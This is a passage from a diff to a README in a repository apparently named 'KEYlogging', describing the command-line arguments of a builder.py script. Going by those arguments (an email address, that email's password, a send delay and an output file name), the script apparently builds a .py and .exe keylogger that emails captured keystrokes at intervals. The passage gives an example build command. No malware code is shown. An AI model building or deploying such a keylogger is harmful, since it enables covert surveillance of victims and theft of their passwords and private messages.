GregYavis/KEYlogging/README.md

  using comand line arguments.
 Information about the comand line arguments can be obtained by typing in the terminal:
 >python3 builder.py -h
+>> -e EMAIL    email addres

+>> -p PASSWORD email password

+>> -d DELAY    delay with whitch letters should be send

+>> -f FILENAME name of ".py" and ".exe" file with your data from other arguments

 *Example comand to create ".exe" file:*
 >python3 builder.py -e example.email@gmail.com -p email_password -d 600 -f result_filename.py